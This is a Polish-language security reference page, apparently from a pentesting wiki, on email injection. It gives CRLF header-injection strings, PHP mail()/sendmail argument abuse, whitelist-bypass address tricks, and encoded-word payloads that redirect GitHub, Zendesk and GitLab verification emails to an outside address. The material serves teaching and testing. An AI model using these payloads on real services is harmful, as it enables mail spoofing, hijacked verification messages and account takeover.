Email Injections

Użyj Trickest, aby łatwo budować i automatyzować przepływy pracy zasilane przez najbardziej zaawansowane narzędzia społecznościowe na świecie. Uzyskaj dostęp już dziś:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Wstrzykiwanie w wysłanym e-mailu

Wstrzykiwanie Cc i Bcc po argumencie nadawcy

From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com

Wiadomość zostanie wysłana na konta odbiorcy i odbiorcy1.

Inject argument

From:sender@domain.com%0ATo:attacker@domain.com

Wiadomość zostanie wysłana do oryginalnego odbiorcy oraz konta atakującego.

Wstrzyknij argument Temat

From:sender@domain.com%0ASubject:This is%20Fake%20Subject

Fałszywy temat zostanie dodany do oryginalnego tematu, a w niektórych przypadkach go zastąpi. Zależy to od zachowania usługi pocztowej.

Zmień treść wiadomości

Wstrzyknij dwa znaki nowej linii, a następnie napisz swoją wiadomość, aby zmienić treść wiadomości.

From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.

Wykorzystanie funkcji mail() w PHP

# The function has the following definition:

php --rf mail

Function [ <internal:standard> function mail ] {
- Parameters [5] {
Parameter #0 [ <required> $to ]
Parameter #1 [ <required> $subject ]
Parameter #2 [ <required> $message ]
Parameter #3 [ <optional> $additional_headers ]
Parameter #4 [ <optional> $additional_parameters ]
}
}

5. parametr ($additional_parameters)

Ta sekcja będzie oparta na tym, jak nadużyć ten parametr, zakładając, że atakujący go kontroluje.

Ten parametr zostanie dodany do linii poleceń, którą PHP będzie używać do wywołania binarnego sendmail. Zostanie jednak oczyszczony za pomocą funkcji escapeshellcmd($additional_parameters).

Atakujący może wstrzyknąć dodatkowe parametry dla sendmail w tym przypadku.

Różnice w implementacji /usr/sbin/sendmail

Interfejs sendmail jest dostarczany przez oprogramowanie MTA email (Sendmail, Postfix, Exim itp.) zainstalowane w systemie. Chociaż podstawowa funkcjonalność (taka jak parametry -t -i -f) pozostaje taka sama z powodów zgodności, inne funkcje i parametry znacznie się różnią w zależności od zainstalowanego MTA.

Oto kilka przykładów różnych stron podręcznika poleceń dla interfejsu sendmail:

• Sendmail MTA: http://www.sendmail.org/~ca/email/man/sendmail.html

• Postfix MTA: http://www.postfix.org/mailq.1.html

• Exim MTA: https://linux.die.net/man/8/eximReferences

W zależności od pochodzenia binarnego sendmail odkryto różne opcje, aby je nadużyć i wyciekować pliki lub nawet wykonywać dowolne polecenia. Sprawdź jak w https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html

Wstrzykiwanie w nazwę e-mail

Ignorowane części e-maila

Symbole: +, - i {} w rzadkich przypadkach mogą być używane do tagowania i są ignorowane przez większość serwerów e-mail.

• Np. john.doe+intigriti@example.com → john.doe@example.com

Komentarze w nawiasach () na początku lub na końcu również będą ignorowane.

• Np. john.doe(intigriti)@example.com → john.doe@example.com

Ominięcie białej listy

Cytaty

IP

Możesz również używać adresów IP jako nazw domenowych w nawiasach kwadratowych:

• john.doe@[127.0.0.1]

• john.doe@[IPv6:2001:db8::1]

Kodowanie e-maili

Jak wyjaśniono w tych badaniach, nazwy e-maili mogą również zawierać zakodowane znaki:

• PHP 256 overflow: Funkcja PHP chr będzie nadal dodawać 256 do znaku, aż stanie się dodatnia, a następnie wykona operację %256.

• String.fromCodePoint(0x10000 + 0x40) // 𐁀 → @

Różne kodowania:

# Format
=? utf-8 ? q ? =41=42=43 ?= hi@example.com --> ABChi@example.com

# =? -> Start of encode
# utf-8 -> encoding used
# ? -> separator
# q -> type of encoding
# ? -> separator
# =41=42=43 -> Hex encoded data
# ?= end of encoding

# Other encodings, same example:
# iso-8859-1
=?iso-8859-1?q?=61=62=63?=hi@example.com
# utf-8
=?utf-8?q?=61=62=63?=hi@example.com
# utf-7
=?utf-7?q?<utf-7 encoded string>?=hi@example.com
# q encoding + utf-7
=?utf-7?q?&=41<utf-7 encoded string without initial A>?=hi@example.com
# base64
=?utf-8?b?QUJD?=hi@example.com
# bas64 + utf-7
=?utf-7?q?<utf-7 encoded string in base64>?=hi@example.com
#punycode
x@xn--svg/-9x6 → x@<svg/

Payloads:

• Github: =?x?q?collab=40psres.net=3e=00?=foo@example.com

• Zauważ zakodowane @ jako =40, zakodowane > jako =3e i null jako =00

• Wyśle wiadomość weryfikacyjną na collab@psres.net

• Zendesk: "=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com

• Ta sama sztuczka co wcześniej, ale dodając zwykły cudzysłów na początku i zakodowany cudzysłów =22 przed zakodowanym @, a następnie otwierając i zamykając cudzysłowy przed następnym adresem e-mail, aby naprawić składnię używaną wewnętrznie przez Zendesk

• Wyśle wiadomość weryfikacyjną na collab@psres.net

• Gitlab: =?x?q?collab=40psres.net_?=foo@example.com

• Zauważ użycie podkreślenia jako spacji do oddzielenia adresu

• Wyśle wiadomość weryfikacyjną na collab@psres.net

• Punycode: Używając Punycode, możliwe było wstrzyknięcie tagu <style w Joomla i nadużycie go do kradzieży tokenu CSRF za pomocą eksfiltracji CSS.

Tooling

• Istnieje skrypt Burp Suite Turbo Intruder, aby fuzzować tego rodzaju kombinacje, aby spróbować zaatakować formaty e-maili. Skrypt ma już potencjalnie działające kombinacje.

• Możliwe jest również użycie Hackvertor do stworzenia ataku dzielącego e-mail

Inne luki

SSO zewnętrznych

XSS

Niektóre usługi, takie jak github lub salesforce, pozwalają na stworzenie adresu e-mail z ładunkami XSS. Jeśli możesz użyć tych dostawców do logowania się do innych usług i te usługi nie sanitizują poprawnie e-maila, możesz spowodować XSS.

Przejęcie konta

Jeśli usługa SSO pozwala na utworzenie konta bez weryfikacji podanego adresu e-mail (jak salesforce) i następnie możesz użyć tego konta do logowania się do innej usługi, która ufa salesforce, możesz uzyskać dostęp do dowolnego konta. Należy zauważyć, że salesforce wskazuje, czy podany e-mail był weryfikowany, ale aplikacja powinna uwzględnić te informacje.

Odpowiedź

Możesz wysłać e-mail używając From: company.com i Replay-To: attacker.com, a jeśli jakakolwiek automatyczna odpowiedź zostanie wysłana z powodu tego, że e-mail został wysłany z wewnętrznego adresu, atakujący może być w stanie otrzymać tę odpowiedź.

Wskaźnik twardych odbić

Niektóre usługi, takie jak AWS, implementują próg znany jako Wskaźnik twardych odbić, zazwyczaj ustawiony na 10%. To krytyczna metryka, szczególnie dla usług dostarczania e-maili. Gdy ten wskaźnik zostanie przekroczony, usługa, taka jak usługa e-mailowa AWS, może zostać zawieszona lub zablokowana.

Twarde odbicie odnosi się do e-maila, który został zwrócony do nadawcy, ponieważ adres odbiorcy jest nieprawidłowy lub nieistniejący. Może to wystąpić z różnych powodów, takich jak e-mail wysłany na nieistniejący adres, domenę, która nie jest rzeczywista, lub odmowa serwera odbiorcy przyjęcia e-maili.

W kontekście AWS, jeśli wyślesz 1000 e-maili, a 100 z nich skutkuje twardymi odbiciami (z powodu takich powodów jak nieprawidłowe adresy lub domeny), oznacza to wskaźnik twardych odbić na poziomie 10%. Osiągnięcie lub przekroczenie tego wskaźnika może spowodować zablokowanie lub zawieszenie możliwości wysyłania e-maili przez AWS SES (Simple Email Service).

Ważne jest, aby utrzymać niski wskaźnik twardych odbić, aby zapewnić nieprzerwaną usługę e-mailową i utrzymać reputację nadawcy. Monitorowanie i zarządzanie jakością adresów e-mail w twoich listach mailingowych może znacząco pomóc w osiągnięciu tego celu.

Aby uzyskać bardziej szczegółowe informacje, można odwołać się do oficjalnej dokumentacji AWS dotyczącej obsługi odbić i skarg AWS SES Bounce Handling.

Odnośniki

• https://resources.infosecinstitute.com/email-injection/

• https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html

• https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view

• https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0

Użyj Trickest, aby łatwo budować i automatyzować przepływy pracy zasilane przez najbardziej zaawansowane narzędzia społecznościowe na świecie. Uzyskaj dostęp już dziś:

Automate OffSec, EASM, and Custom Security Processes | Trickest